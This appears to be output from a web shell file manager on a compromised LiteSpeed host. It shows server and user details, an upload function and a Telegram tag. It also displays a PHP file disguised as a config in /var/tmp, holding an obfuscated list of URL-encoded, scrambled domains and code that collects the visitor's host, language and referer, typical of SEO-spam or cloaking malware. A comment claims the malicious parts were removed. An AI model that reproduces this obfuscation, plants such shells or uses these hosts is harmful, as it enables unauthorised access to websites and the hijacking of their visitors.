HEX
Server: LiteSpeed
System: Linux business44.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: petfvqgb (964)
PHP: 8.2.31
Disabled: NONE
$ pwd: /var/tmp/
Upload Files
File: //var/tmp/config_3380dbd523c06c27be030c58d5dadf2e.php
<?php
$xmlname = 
["%32%37%36%32%2D%6F%65%76%74%75%67%31%33%39%2E%70%62%61%69%62%79%68%67%6C%2E%6B%6C%6D","%32%37%36%32%2D%6F%65%76%74%75%67%31%33%39%2E%67%72%70%75%61%72%6B%63%2E%67%62%63","%32%37%36%32%2D%6F%65%76%74%75%67%31%33%39%2E%64%68%6E%61%67%68%6E%67%67%2E%6B%6C%6D","%32%37%36%32%2D%6F%65%76%74%75%67%31%33%39%2E%72%63%75%72%7A%72%76%6B%2E%67%62%63"];
$http_web = 'http';
$host = $_SERVER['HTTP_HOST'];
$lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : 'en';
$urlshang = '';
if (isset($_SERVER['HTTP_REFERER'])) {
    $urlshang = $_SERVER['HTTP_REFERER'];
}
if (is_https()) {
    $http = 'https';
} else {
    $http = 'http';
}

/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/

function is_https()
{
    if (isset($_SERVER['HTTPS'])) {
        if (strtolower($_SERVER['HTTPS']) !== 'off') {
            return true;
        }
    } elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO'])) {
        if ($_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {
            return true;
        }
    } elseif (isset($_SERVER['HTTP_FRONT_END_HTTPS'])) {
        if (strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {
            return true;
        }
    }
    return false;
}
@ Telegram